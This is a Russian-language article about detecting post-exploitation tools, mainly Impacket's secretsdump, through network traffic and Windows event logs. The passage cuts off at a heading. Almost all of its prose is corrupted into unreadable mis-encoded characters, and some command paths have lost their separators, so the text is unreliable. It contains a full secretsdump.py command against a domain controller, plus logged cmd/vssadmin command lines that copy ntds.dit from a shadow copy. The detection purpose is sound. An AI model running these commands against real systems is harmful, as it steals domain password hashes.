Π‘ ΠΊΠ°ΠΆΠ΄ΡΠΌ Π³ΠΎΠ΄ΠΎΠΌ ΡΠ°ΡΡΠ΅Ρ ΠΊΠΎΠ»ΠΈΡΠ΅ΡΡΠ²ΠΎ Π°ΡΠ°ΠΊ Π² ΠΊΠΎΡΠΏΠΎΡΠ°ΡΠΈΠ²Π½ΠΎΠΌ ΡΠ΅ΠΊΡΠΎΡΠ΅: Π½Π°ΠΏΡΠΈΠΌΠ΅Ρ
Π‘ΡΠΎΠΈΡ ΠΎΡΠΌΠ΅ΡΠΈΡΡ, ΡΡΠΎ ΡΡΠΈ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½ΡΡ ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΡΡΡΡ Π½Π΅ Π΄Π»Ρ ΠΏΠ΅ΡΠ²ΠΈΡΠ½ΠΎΠ³ΠΎ ΠΏΡΠΎΠ½ΠΈΠΊΠ½ΠΎΠ²Π΅Π½ΠΈΡ, Π° Π΄Π»Ρ ΡΠ°Π·Π²ΠΈΡΠΈΡ Π°ΡΠ°ΠΊΠΈ Π²Π½ΡΡΡΠΈ ΠΈΠ½ΡΡΠ°ΡΡΡΡΠΊΡΡΡΡ. ΠΠ»ΠΎΡΠΌΡΡΠ»Π΅Π½Π½ΠΈΠΊΠΈ ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΡΡ ΠΈΡ
Π½Π° ΡΠ°Π·Π½ΡΡ
ΡΡΠ°Π΄ΠΈΡΡ
Π°ΡΠ°ΠΊΠΈ, ΡΠ»Π΅Π΄ΡΡΡΠΈΡ
ΠΏΠΎΡΠ»Π΅ ΠΏΡΠ΅ΠΎΠ΄ΠΎΠ»Π΅Π½ΠΈΡ ΠΏΠ΅ΡΠΈΠΌΠ΅ΡΡΠ°. ΠΡΠΎ, ΠΊ ΡΠ»ΠΎΠ²Ρ ΡΠΊΠ°Π·Π°ΡΡ, ΡΠ»ΠΎΠΆΠ½ΠΎ Π΄Π΅ΡΠ΅ΠΊΡΠΈΡΡΠ΅ΡΡΡ ΠΈ Π·Π°ΡΠ°ΡΡΡΡ ΡΠΎΠ»ΡΠΊΠΎ Ρ ΠΏΠΎΠΌΠΎΡΡΡ ΡΠ΅Ρ
Π½ΠΎΠ»ΠΎΠ³ΠΈΠΉ
Π§ΡΠΎ Π½Π°ΠΌ Π½Π΅ΠΎΠ±Ρ ΠΎΠ΄ΠΈΠΌΠΎ Π±ΡΠ»ΠΎ ΡΠ΄Π΅Π»Π°ΡΡ:
- ΠΠΎΠ½ΡΡΡ, ΠΊΠ°ΠΊ ΡΠ°Π±ΠΎΡΠ°Π΅Ρ Ρ Π°ΠΊΠ΅ΡΡΠΊΠΈΠΉ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½ΡΠ°ΡΠΈΠΉ. Π£Π·Π½Π°ΡΡ, ΡΡΠΎ Π½Π΅ΠΎΠ±Ρ ΠΎΠ΄ΠΈΠΌΠΎ Π°ΡΠ°ΠΊΡΡΡΠΈΠΌ Π΄Π»Ρ ΡΠΊΡΠΏΠ»ΡΠ°ΡΠ°ΡΠΈΠΈ ΠΈ ΠΊΠ°ΠΊΠΈΠΌΠΈ ΡΠ΅Ρ Π½ΠΎΠ»ΠΎΠ³ΠΈΡΠΌΠΈ ΠΎΠ½ΠΈ ΠΌΠΎΠ³ΡΡ Π²ΠΎΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΡΡΡ.
- ΠΠ°ΠΉΡΠΈ ΡΠΎ, ΡΡΠΎ Π½Π΅ Π΄Π΅ΡΠ΅ΠΊΡΠΈΡΡΠ΅ΡΡΡ ΡΡΠ΅Π΄ΡΡΠ²Π°ΠΌΠΈ ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΠΎΠ½Π½ΠΎΠΉ Π±Π΅Π·ΠΎΠΏΠ°ΡΠ½ΠΎΡΡΠΈ Π½Π° ΠΏΠ΅ΡΠ²ΡΡ ΡΡΠ°Π΄ΠΈΡΡ Π°ΡΠ°ΠΊΠΈ. Π‘ΡΠ°Π΄ΠΈΡ ΡΠ°Π·Π²Π΅Π΄ΠΊΠΈ ΠΌΠΎΠΆΠ΅Ρ Π±ΡΡΡ ΠΏΡΠΎΠΏΡΡΠ΅Π½Π°, Π»ΠΈΠ±ΠΎ ΠΏΠΎΡΠΎΠΌΡ ΡΡΠΎ Π°ΡΠ°ΠΊΡΡΡΠΈΠΌ Π²ΡΡΡΡΠΏΠ°Π΅Ρ Π²Π½ΡΡΡΠ΅Π½Π½ΠΈΠΉ Π·Π»ΠΎΡΠΌΡΡΠ»Π΅Π½Π½ΠΈΠΊ, Π»ΠΈΠ±ΠΎ ΠΏΠΎΡΠΎΠΌΡ ΡΡΠΎ Π°ΡΠ°ΠΊΡΡΡΠΈΠΉ ΠΏΠΎΠ»ΡΠ·ΡΠ΅ΡΡΡ Π±ΡΠ΅ΡΡΡ Π² ΠΈΠ½ΡΡΠ°ΡΡΡΡΠΊΡΡΡΠ΅, ΠΎ ΠΊΠΎΡΠΎΡΠΎΠΉ Π½Π΅ Π±ΡΠ»ΠΎ ΠΈΠ·Π²Π΅ΡΡΠ½ΠΎ ΡΠ°Π½Π΅Π΅. ΠΠΎΡΠ²Π»ΡΠ΅ΡΡΡ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡΡ Π²ΠΎΡΡΡΠ°Π½ΠΎΠ²ΠΈΡΡ Π²ΡΡ ΡΠ΅ΠΏΠΎΡΠΊΡ Π΅Π³ΠΎ Π΄Π΅ΠΉΡΡΠ²ΠΈΠΉ, ΠΎΡΡΡΠ΄Π° Π²ΠΎΠ·Π½ΠΈΠΊΠ°Π΅Ρ ΠΆΠ΅Π»Π°Π½ΠΈΠ΅ ΠΎΠ±Π½Π°ΡΡΠΆΠΈΠ²Π°ΡΡ Π΄Π°Π»ΡΠ½Π΅ΠΉΡΠ΅Π΅ ΠΏΠ΅ΡΠ΅Π΄Π²ΠΈΠΆΠ΅Π½ΠΈΠ΅.
- Π£ΡΡΡΠ°Π½ΠΈΡΡ Π»ΠΎΠΆΠ½ΡΠ΅ ΡΡΠ°Π±Π°ΡΡΠ²Π°Π½ΠΈΡ ΡΡΠ΅Π΄ΡΡΠ² ΠΎΠ±Π½Π°ΡΡΠΆΠ΅Π½ΠΈΡ Π²ΡΠΎΡΠΆΠ΅Π½ΠΈΠΉ. ΠΠ΅Π»ΡΠ·Ρ Π·Π°Π±ΡΠ²Π°ΡΡ ΠΈ ΠΎ ΡΠΎΠΌ, ΡΡΠΎ ΠΏΡΠΈ ΠΎΠ±Π½Π°ΡΡΠΆΠ΅Π½ΠΈΠΈ ΡΠ΅Ρ ΠΈΠ»ΠΈ ΠΈΠ½ΡΡ Π΄Π΅ΠΉΡΡΠ²ΠΈΠΉ Π½Π° ΠΎΡΠ½ΠΎΠ²Π΅ ΠΎΠ΄Π½ΠΎΠΉ ΡΠΎΠ»ΡΠΊΠΎ ΡΠ°Π·Π²Π΅Π΄ΠΊΠΈ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½Ρ ΡΠ°ΡΡΡΠ΅ ΠΎΡΠΈΠ±ΠΊΠΈ. ΠΠ±ΡΡΠ½ΠΎ Π² ΠΈΠ½ΡΡΠ°ΡΡΡΡΠΊΡΡΡΠ΅ ΡΡΡΠ΅ΡΡΠ²ΡΠ΅Ρ Π΄ΠΎΡΡΠ°ΡΠΎΡΠ½ΠΎΠ΅ ΠΊΠΎΠ»ΠΈΡΠ΅ΡΡΠ²ΠΎ ΡΠΏΠΎΡΠΎΠ±ΠΎΠ², Π½Π΅ΠΎΡΠ»ΠΈΡΠΈΠΌΡΡ ΠΎΡ Π»Π΅Π³ΠΈΡΠΈΠΌΠ½ΡΡ Π½Π° ΠΏΠ΅ΡΠ²ΡΠΉ Π²Π·Π³Π»ΡΠ΄, ΠΏΠΎΠ»ΡΡΠΈΡΡ ΠΊΠ°ΠΊΡΡ-Π»ΠΈΠ±ΠΎ ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΡ.
Π§ΡΠΎ ΠΆΠ΅ Π΄Π°ΡΡ Π°ΡΠ°ΠΊΡΡΡΠΈΠΌ ΡΡΠΈ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½ΡΡ? ΠΡΠ»ΠΈ ΡΡΠΎ Impacket, ΡΠΎ Π·Π»ΠΎΡΠΌΡΡΠ»Π΅Π½Π½ΠΈΠΊΠΈ ΠΏΠΎΠ»ΡΡΠ°ΡΡ Π±ΠΎΠ»ΡΡΡΡ Π±ΠΈΠ±Π»ΠΈΠΎΡΠ΅ΠΊΡ ΠΌΠΎΠ΄ΡΠ»Π΅ΠΉ, ΠΊΠΎΡΠΎΡΡΠ΅ ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΡ Π½Π° ΡΠ°Π·Π½ΡΡ ΡΡΠ°Π΄ΠΈΡΡ Π°ΡΠ°ΠΊΠΈ, ΡΠ»Π΅Π΄ΡΡΡΠΈΡ ΠΏΠΎΡΠ»Π΅ ΠΏΡΠ΅ΠΎΠ΄ΠΎΠ»Π΅Π½ΠΈΡ ΠΏΠ΅ΡΠΈΠΌΠ΅ΡΡΠ°. ΠΠ½ΠΎΠ³ΠΈΠ΅ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½ΡΡ ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΡΡ ΠΌΠΎΠ΄ΡΠ»ΠΈ Impacket Ρ ΡΠ΅Π±Ρ Π²Π½ΡΡΡΠΈ β Π½Π°ΠΏΡΠΈΠΌΠ΅Ρ, Metasploit. Π Π½Π΅ΠΌ ΠΈΠΌΠ΅ΡΡΡΡ dcomexec ΠΈ wmiexec Π΄Π»Ρ ΡΠ΄Π°Π»Π΅Π½Π½ΠΎΠ³ΠΎ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΡ ΠΊΠΎΠΌΠ°Π½Π΄, secretsdump Π΄Π»Ρ ΠΏΠΎΠ»ΡΡΠ΅Π½ΠΈΡ ΡΡΠ΅ΡΠ½ΡΡ Π·Π°ΠΏΠΈΡΠ΅ΠΉ ΠΈΠ· ΠΏΠ°ΠΌΡΡΠΈ, ΠΊΠΎΡΠΎΡΡΠ΅ Π΄ΠΎΠ±Π°Π²Π»Π΅Π½Ρ ΠΈΠ· Impacket. Π ΠΈΡΠΎΠ³Π΅ ΠΏΡΠ°Π²ΠΈΠ»ΡΠ½ΠΎΠ΅ ΠΎΠ±Π½Π°ΡΡΠΆΠ΅Π½ΠΈΠ΅ Π°ΠΊΡΠΈΠ²Π½ΠΎΡΡΠΈ ΡΠ°ΠΊΠΎΠΉ Π±ΠΈΠ±Π»ΠΈΠΎΡΠ΅ΠΊΠΈ ΠΎΠ±Π΅ΡΠΏΠ΅ΡΠΈΡ ΠΈ ΠΎΠ±Π½Π°ΡΡΠΆΠ΅Π½ΠΈΠ΅ ΠΏΡΠΎΠΈΠ·Π²ΠΎΠ΄Π½ΡΡ .
Π CrackMapExec (ΠΈΠ»ΠΈ ΠΏΡΠΎΡΡΠΎ CME) ΡΠΎΠ·Π΄Π°ΡΠ΅Π»ΠΈ Π½Π΅ΡΠ»ΡΡΠ°ΠΉΠ½ΠΎ Π½Π°ΠΏΠΈΡΠ°Π»ΠΈ Β«Powered by ImpacketΒ». ΠΡΠΎΠΌΠ΅ ΡΠΎΠ³ΠΎ, CME ΠΈΠΌΠ΅Π΅Ρ Π² ΡΠ΅Π±Π΅ Π³ΠΎΡΠΎΠ²ΡΡ ΡΡΠ½ΠΊΡΠΈΠΎΠ½Π°Π»ΡΠ½ΠΎΡΡΡ Π΄Π»Ρ ΠΏΠΎΠΏΡΠ»ΡΡΠ½ΡΡ ΡΡΠ΅Π½Π°ΡΠΈΠ΅Π²: ΡΡΠΎ ΠΈ Mimikatz Π΄Π»Ρ ΠΏΠΎΠ»ΡΡΠ΅Π½ΠΈΡ ΠΏΠ°ΡΠΎΠ»Π΅ΠΉ ΠΈΠ»ΠΈ ΠΈΡ Ρ Π΅ΡΠ΅ΠΉ, ΠΈ Π²Π½Π΅Π΄ΡΠ΅Π½ΠΈΠ΅ Meterpreter Π»ΠΈΠ±ΠΎ Empire agent Π΄Π»Ρ ΡΠ΄Π°Π»Π΅Π½Π½ΠΎΠ³ΠΎ ΠΈΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΡ, ΠΈ Bloodhound Π½Π° Π±ΠΎΡΡΡ.
Π’ΡΠ΅ΡΠΈΠΉ Π²ΡΠ±ΡΠ°Π½Π½ΡΠΉ Π½Π°ΠΌΠΈ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½Ρ β Koadic. ΠΠ½ Π΄ΠΎΡΡΠ°ΡΠΎΡΠ½ΠΎ ΡΠ²Π΅ΠΆ, Π±ΡΠ» ΠΏΡΠ΅Π΄ΡΡΠ°Π²Π»Π΅Π½ Π½Π° ΠΌΠ΅ΠΆΠ΄ΡΠ½Π°ΡΠΎΠ΄Π½ΠΎΠΉ Ρ Π°ΠΊΠ΅ΡΡΠΊΠΎΠΉ ΠΊΠΎΠ½ΡΠ΅ΡΠ΅Π½ΡΠΈΠΈ DEFCON 25 Π² 2017 Π³ΠΎΠ΄Ρ ΠΈ ΠΎΡΠ»ΠΈΡΠ°Π΅ΡΡΡ Π½Π΅ΡΡΠ°Π½Π΄Π°ΡΡΠ½ΡΠΌ ΠΏΠΎΠ΄Ρ ΠΎΠ΄ΠΎΠΌ: ΡΠ°Π±ΠΎΡΠΎΠΉ ΡΠ΅ΡΠ΅Π· HTTP, Java Script ΠΈ Microsoft Visual Basic Script (VBS). Π’Π°ΠΊΠΎΠΉ ΠΏΠΎΠ΄Ρ ΠΎΠ΄ Π½Π°Π·ΡΠ²Π°ΡΡ living off the land: ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½Ρ ΠΏΠΎΠ»ΡΠ·ΡΠ΅ΡΡΡ Π½Π°Π±ΠΎΡΠΎΠΌ Π·Π°Π²ΠΈΡΠΈΠΌΠΎΡΡΠ΅ΠΉ ΠΈ Π±ΠΈΠ±Π»ΠΈΠΎΡΠ΅ΠΊ, Π²ΡΡΡΠΎΠ΅Π½Π½ΡΡ Π² Windows. Π‘ΠΎΠ·Π΄Π°ΡΠ΅Π»ΠΈ Π½Π°Π·ΡΠ²Π°ΡΡ Π΅Π³ΠΎ COM Π‘ommand & Π‘ontrol, ΠΈΠ»ΠΈ Π‘3.
IMPACKET
Π€ΡΠ½ΠΊΡΠΈΠΎΠ½Π°Π»ΡΠ½ΠΎΡΡΡ Impacket Π²Π΅ΡΡΠΌΠ° ΡΠΈΡΠΎΠΊΠ°, Π½Π°ΡΠΈΠ½Π°Ρ ΠΎΡ ΡΠ°Π·Π²Π΅Π΄ΠΊΠΈ Π²Π½ΡΡΡΠΈ AD ΠΈ ΡΠ±ΠΎΡΠ° Π΄Π°Π½Π½ΡΡ Ρ Π²Π½ΡΡΡΠ΅Π½Π½ΠΈΡ ΡΠ΅ΡΠ²Π΅ΡΠΎΠ² MS SQL, Π·Π°ΠΊΠ°Π½ΡΠΈΠ²Π°Ρ ΡΠ΅Ρ Π½ΠΈΠΊΠ°ΠΌΠΈ Π΄Π»Ρ ΠΏΠΎΠ»ΡΡΠ΅Π½ΠΈΡ ΡΡΠ΅ΡΠ½ΡΡ Π΄Π°Π½Π½ΡΡ : ΡΡΠΎ ΠΈ Π°ΡΠ°ΠΊΠ° SMB relay, ΠΈ ΠΏΠΎΠ»ΡΡΠ΅Π½ΠΈΠ΅ Ρ ΠΊΠΎΠ½ΡΡΠΎΠ»Π»Π΅ΡΠ° Π΄ΠΎΠΌΠ΅Π½Π° ΡΠ°ΠΉΠ»Π° ntds.dit, ΡΠΎΠ΄Π΅ΡΠΆΠ°ΡΠ΅Π³ΠΎ Ρ Π΅ΡΠΈ ΠΏΠ°ΡΠΎΠ»Π΅ΠΉ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Π΅ΠΉ. Π’Π°ΠΊΠΆΠ΅ Impacket ΡΠ΄Π°Π»Π΅Π½Π½ΠΎ Π²ΡΠΏΠΎΠ»Π½ΡΠ΅Ρ ΠΊΠΎΠΌΠ°Π½Π΄Ρ, ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΡ ΡΠ΅ΡΡΡΠ΅ ΡΠ°Π·Π»ΠΈΡΠ½ΡΡ ΡΠΏΠΎΡΠΎΠ±Π°: ΡΠ΅ΡΠ΅Π· WMI, ΡΠ΅ΡΠ²ΠΈΡ Π΄Π»Ρ ΡΠΏΡΠ°Π²Π»Π΅Π½ΠΈΡ ΠΏΠ»Π°Π½ΠΈΡΠΎΠ²ΡΠΈΠΊΠΎΠΌ Windows, DCOM ΠΈ SMB, ΠΈ Π΄Π»Ρ ΡΡΠΎΠ³ΠΎ Π΅ΠΌΡ Π½ΡΠΆΠ½Ρ ΡΡΠ΅ΡΠ½ΡΠ΅ Π΄Π°Π½Π½ΡΠ΅.
Secretsdump
ΠΠ°Π²Π°ΠΉΡΠ΅ ΡΠ°ΡΡΠΌΠΎΡΡΠΈΠΌ secretsdump. ΠΡΠΎ ΠΌΠΎΠ΄ΡΠ»Ρ, ΡΠ΅Π»ΡΡ ΠΊΠΎΡΠΎΡΠΎΠ³ΠΎ ΠΌΠΎΠ³ΡΡ Π±ΡΡΡ ΠΊΠ°ΠΊ ΠΌΠ°ΡΠΈΠ½Ρ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Π΅ΠΉ, ΡΠ°ΠΊ ΠΈ ΠΊΠΎΠ½ΡΡΠΎΠ»Π»Π΅ΡΡ Π΄ΠΎΠΌΠ΅Π½Π°. Π‘ Π΅Π³ΠΎ ΠΏΠΎΠΌΠΎΡΡΡ ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΠ»ΡΡΠ°ΡΡ ΠΊΠΎΠΏΠΈΠΈ ΠΎΠ±Π»Π°ΡΡΠ΅ΠΉ ΠΏΠ°ΠΌΡΡΠΈ LSA, SAM, SECURITY, NTDS.dit, ΠΏΠΎΡΡΠΎΠΌΡ Π΅Π³ΠΎ ΠΌΠΎΠΆΠ½ΠΎ ΡΠ²ΠΈΠ΄Π΅ΡΡ Π½Π° ΡΠ°Π·Π½ΡΡ ΡΡΠ°Π΄ΠΈΡΡ Π°ΡΠ°ΠΊΠΈ. ΠΠ΅ΡΠ²ΡΠΌ ΡΠ°Π³ΠΎΠΌ Π² ΡΠ°Π±ΠΎΡΠ΅ ΠΌΠΎΠ΄ΡΠ»Ρ ΡΠ²Π»ΡΠ΅ΡΡΡ Π°ΡΡΠ΅Π½ΡΠΈΡΠΈΠΊΠ°ΡΠΈΡ ΡΠ΅ΡΠ΅Π· SMB, Π΄Π»Ρ ΠΊΠΎΡΠΎΡΠΎΠΉ Π½Π΅ΠΎΠ±Ρ ΠΎΠ΄ΠΈΠΌ Π»ΠΈΠ±ΠΎ ΠΏΠ°ΡΠΎΠ»Ρ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ, Π»ΠΈΠ±ΠΎ Π΅Π³ΠΎ Ρ Π΅Ρ Π΄Π»Ρ Π°Π²ΡΠΎΠΌΠ°ΡΠΈΡΠ΅ΡΠΊΠΎΠ³ΠΎ ΠΏΡΠΎΠ²Π΅Π΄Π΅Π½ΠΈΡ Π°ΡΠ°ΠΊΠΈ Pass the Hash. ΠΠ°Π»Π΅Π΅ ΠΈΠ΄Π΅Ρ Π·Π°ΠΏΡΠΎΡ Π½Π° ΠΎΡΠΊΡΡΡΠΈΠ΅ Π΄ΠΎΡΡΡΠΏΠ° ΠΊ Service Control Manager (SCM) ΠΈ ΠΏΠΎΠ»ΡΡΠ΅Π½ΠΈΠ΅ Π΄ΠΎΡΡΡΠΏΠ° ΠΊ ΡΠ΅Π΅ΡΡΡΡ ΠΏΠΎ ΠΏΡΠΎΡΠΎΠΊΠΎΠ»Ρ winreg, ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΡ ΠΊΠΎΡΠΎΡΡΠΉ Π°ΡΠ°ΠΊΡΡΡΠΈΠΉ ΠΌΠΎΠΆΠ΅Ρ ΡΠ·Π½Π°ΡΡ Π΄Π°Π½Π½ΡΠ΅ ΠΈΠ½ΡΠ΅ΡΠ΅ΡΡΡΡΠΈΡ Π΅Π³ΠΎ Π²Π΅ΡΠΎΠΊ ΠΈ ΠΏΠΎΠ»ΡΡΠΈΡΡ ΡΠ΅Π·ΡΠ»ΡΡΠ°ΡΡ ΡΠ΅ΡΠ΅Π· SMB.
ΠΠ° ΡΠΈΡ. 1 ΠΌΡ Π²ΠΈΠ΄ΠΈΠΌ, ΠΊΠ°ΠΊ ΠΈΠΌΠ΅Π½Π½ΠΎ ΠΏΡΠΈ ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π½ΠΈΠΈ ΠΏΡΠΎΡΠΎΠΊΠΎΠ»Π° winreg ΠΏΡΠΎΠΈΡΡ ΠΎΠ΄ΠΈΡ ΠΏΠΎΠ»ΡΡΠ΅Π½ΠΈΠ΅ Π΄ΠΎΡΡΡΠΏΠ° ΠΏΠΎ ΠΊΠ»ΡΡΡ ΡΠ΅Π΅ΡΡΡΠ° Ρ LSA. ΠΠ»Ρ ΡΡΠΎΠ³ΠΎ ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΠ΅ΡΡΡ ΠΊΠΎΠΌΠ°Π½Π΄Π° DCERPC Ρ opcode 15 β OpenKey.
Π ΠΈΡ. 1. ΠΡΠΊΡΡΡΠΈΠ΅ ΠΊΠ»ΡΡΠ° ΡΠ΅Π΅ΡΡΡΠ° ΠΏΠΎ ΠΏΡΠΎΡΠΎΠΊΠΎΠ»Ρ winreg
ΠΠ°Π»Π΅Π΅, ΠΊΠΎΠ³Π΄Π° Π΄ΠΎΡΡΡΠΏ ΠΏΠΎ ΠΊΠ»ΡΡΡ ΠΏΠΎΠ»ΡΡΠ΅Π½, ΠΏΡΠΎΠΈΡΡ ΠΎΠ΄ΠΈΡ ΡΠΎΡ ΡΠ°Π½Π΅Π½ΠΈΠ΅ Π·Π½Π°ΡΠ΅Π½ΠΈΠΉ ΠΊΠΎΠΌΠ°Π½Π΄ΠΎΠΉ SaveKey Ρ opcode 20. Impacket Π΄Π΅Π»Π°Π΅Ρ ΡΡΠΎ Π²Π΅ΡΡΠΌΠ° ΡΠΏΠ΅ΡΠΈΡΠΈΡΠ½ΠΎ. ΠΠ½ ΡΠΎΡ ΡΠ°Π½ΡΠ΅Ρ Π·Π½Π°ΡΠ΅Π½ΠΈΡ Π² ΡΠ°ΠΉΠ», ΠΈΠΌΡ ΠΊΠΎΡΠΎΡΠΎΠ³ΠΎ β ΡΡΠΎ ΡΡΡΠΎΠΊΠ° ΠΈΠ· 8 ΡΠ»ΡΡΠ°ΠΉΠ½ΡΡ ΡΠΈΠΌΠ²ΠΎΠ»ΠΎΠ² Ρ Π΄ΠΎΠ±Π°Π²Π»Π΅Π½ΠΈΠ΅ΠΌ .tmp. ΠΡΠΎΠΌΠ΅ ΡΠΎΠ³ΠΎ, Π΄Π°Π»ΡΠ½Π΅ΠΉΡΠ°Ρ Π²ΡΠ³ΡΡΠ·ΠΊΠ° ΡΡΠΎΠ³ΠΎ ΡΠ°ΠΉΠ»Π° ΠΏΡΠΎΠΈΡΡ ΠΎΠ΄ΠΈΡ ΡΠ΅ΡΠ΅Π· SMB ΠΈΠ· Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΠΈ System32 (ΡΠΈΡ. 2).
Π ΠΈΡ. 2. Π‘Ρ
Π΅ΠΌΠ° ΠΏΠΎΠ»ΡΡΠ΅Π½ΠΈΡ ΠΊΠ»ΡΡΠ° ΡΠ΅Π΅ΡΡΡΠ° Ρ ΡΠ΄Π°Π»Π΅Π½Π½ΠΎΠΉ ΠΌΠ°ΡΠΈΠ½Ρ
ΠΡΡ ΠΎΠ΄ΠΈΡ, ΠΎΠ±Π½Π°ΡΡΠΆΠΈΡΡ ΠΏΠΎΠ΄ΠΎΠ±Π½ΡΡ Π°ΠΊΡΠΈΠ²Π½ΠΎΡΡΡ Π² ΡΠ΅ΡΠΈ ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎ Π·Π°ΠΏΡΠΎΡΠ°ΠΌ ΠΊ ΠΎΠΏΡΠ΅Π΄Π΅Π»Π΅Π½Π½ΡΠΌ Π²Π΅ΡΠΊΠ°ΠΌ ΡΠ΅Π΅ΡΡΡΠ° ΠΏΠΎ ΠΏΡΠΎΡΠΎΠΊΠΎΠ»Ρ winreg, ΡΠΏΠ΅ΡΠΈΡΠΈΡΠ½ΡΠΌ ΠΈΠΌΠ΅Π½Π°ΠΌ, ΠΊΠΎΠΌΠ°Π½Π΄Π°ΠΌ ΠΈ ΠΈΡ ΠΏΠΎΡΡΠ΄ΠΊΡ.
Π’Π°ΠΊΠΆΠ΅ ΡΡΠΎΡ ΠΌΠΎΠ΄ΡΠ»Ρ ΠΎΡΡΠ°Π²Π»ΡΠ΅Ρ ΡΠ»Π΅Π΄Ρ Π² ΠΆΡΡΠ½Π°Π»Π΅ ΡΠΎΠ±ΡΡΠΈΠΉ Windows, Π±Π»Π°Π³ΠΎΠ΄Π°ΡΡ ΠΊΠΎΡΠΎΡΡΠΌ ΠΎΠ½ Π»Π΅Π³ΠΊΠΎ ΠΎΠ±Π½Π°ΡΡΠΆΠΈΠ²Π°Π΅ΡΡΡ. ΠΠ°ΠΏΡΠΈΠΌΠ΅Ρ, Π² ΡΠ΅Π·ΡΠ»ΡΡΠ°ΡΠ΅ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΡ ΠΊΠΎΠΌΠ°Π½Π΄Ρ
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC
Π² ΠΆΡΡΠ½Π°Π»Π΅ Windows Server 2016 ΡΠ²ΠΈΠ΄ΠΈΠΌ ΡΠ»Π΅Π΄ΡΡΡΡΡ ΠΊΠ»ΡΡΠ΅Π²ΡΡ ΠΏΠΎΡΠ»Π΅Π΄ΠΎΠ²Π°ΡΠ΅Π»ΡΠ½ΠΎΡΡΡ ΡΠΎΠ±ΡΡΠΈΠΉ:
1. 4624 β ΡΠ΄Π°Π»Π΅Π½Π½ΡΠΉ Logon.
2. 5145 β ΠΏΡΠΎΠ²Π΅ΡΠΊΠ° ΠΏΡΠ°Π² Π΄ΠΎΡΡΡΠΏΠ° ΠΊ ΡΠ΄Π°Π»Π΅Π½Π½ΠΎΠΌΡ ΡΠ΅ΡΠ²ΠΈΡΡ winreg.
3. 5145 β ΠΏΡΠΎΠ²Π΅ΡΠΊΠ° ΠΏΡΠ°Π² Π΄ΠΎΡΡΡΠΏΠ° ΠΊ ΡΠ°ΠΉΠ»Ρ Π² Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΠΈ System32. Π€Π°ΠΉΠ» ΠΈΠΌΠ΅Π΅Ρ ΡΠ»ΡΡΠ°ΠΉΠ½ΠΎΠ΅ ΠΈΠΌΡ, ΡΠΏΠΎΠΌΡΠ½ΡΡΠΎΠ΅ Π²ΡΡΠ΅.
4. 4688 β ΡΠΎΠ·Π΄Π°Π½ΠΈΠ΅ ΠΏΡΠΎΡΠ΅ΡΡΠ° cmd.exe, ΠΊΠΎΡΠΎΡΡΠΉ Π·Π°ΠΏΡΡΠΊΠ°Π΅Ρ vssadmin:
βC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 β ΡΠΎΠ·Π΄Π°Π½ΠΈΠ΅ ΠΏΡΠΎΡΠ΅ΡΡΠ° Ρ ΠΊΠΎΠΌΠ°Π½Π΄ΠΎΠΉ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
6. 4688 β ΡΠΎΠ·Π΄Π°Π½ΠΈΠ΅ ΠΏΡΠΎΡΠ΅ΡΡΠ° Ρ ΠΊΠΎΠΌΠ°Π½Π΄ΠΎΠΉ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
7. 4688 β ΡΠΎΠ·Π΄Π°Π½ΠΈΠ΅ ΠΏΡΠΎΡΠ΅ΡΡΠ° Ρ ΠΊΠΎΠΌΠ°Π½Π΄ΠΎΠΉ:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
Smbexec
